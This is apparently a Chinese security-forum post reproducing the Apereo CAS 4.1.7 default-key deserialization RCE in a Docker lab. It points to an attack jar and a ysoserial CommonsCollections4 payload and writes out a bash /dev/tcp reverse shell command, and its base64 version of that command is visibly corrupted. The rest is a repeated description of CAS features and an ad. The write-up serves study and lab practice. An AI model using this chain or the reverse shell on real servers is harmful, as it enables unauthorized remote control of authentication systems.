-
-
[原创]apereo cas4.1反序列化漏洞复现
-
发表于: 2023-9-4 19:28
-
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。影响版本 Apereo CAS <= 4.1.7
实战中sessionkey也不允许从后端发送前端传输
sessionkey不允许出现在响应包和请求包里
反序列化过程中拿到key就能rce
docker search查看镜像可用版本信息:
docker pull apereo/cas获取最新镜像,如果你有指定的版本,后面加上冒号版本号即可
命令如下:
docker ps查看端口信息:
攻击机查看靶场环境,靶机IP:8080/cas/login
漏洞利用参数 登录处 抓包 可看到
使用apereo-cas-attack-1.0-SNAPSHOT-all.jar生成加密的ysoserial的序列化对象payload
下载地址:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar
要执行的命令 在后边输入 反弹shell需要编码
使用ysoserial的CommonsCollections4生成加密后的Payload:
docker exec -it xxxxxx bash
bash -i >& /dev/tcp/ip/12340 0>&1
base64编码:YmFzaCAtaSA+JiAvZGV2zNS4xMDQvMTIzNDAgMD4mMQ==
遇到的问题:防火墙没给端口放行
shell成功
Apereo CAS(Central Authentication Service)是一个开源的单点登录(SSO)应用程序,用于为多个应用程序提供统一的身份认证和授权服务。CAS 提供了以下几个主要的用途:1、单点登录(SSO):Apereo CAS 允许用户在一次认证后访问多个相互信任的应用程序,无需再次输入凭据。用户只需要登录一次,然后就可以自由地访问其他已集成到 CAS 的应用程序。
2、身份认证和授权:CAS 提供了强大的身份认证和授权机制,确保只有经过认证和授权的用户才能访问被保护的资源。CAS 支持多种认证方式,包括用户名/密码认证、基于证书的认证、双因素认证等。
3、客户端与服务端的集成:Apereo CAS 提供了客户端和服务端的组件,可以轻松地将 CAS 集成到现有的应用程序中。CAS 客户端负责处理用户登录请求,而 CAS 服务端则负责验证用户凭据并发放票据(Ticket),实现单点登录的功能。
4、安全性和可扩展性:Apereo CAS 提供了多种安全性措施,如防止重放攻击、会话管理、票据管理等。此外,CAS 还具有高度可扩展性,可以轻松地集成到复杂的身份管理和认证架构中
Apereo CAS(Central Authentication Service)是一个开源的单点登录(SSO)应用程序,用于为多个应用程序提供统一的身份认证和授权服务。CAS 提供了以下几个主要的用途:[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
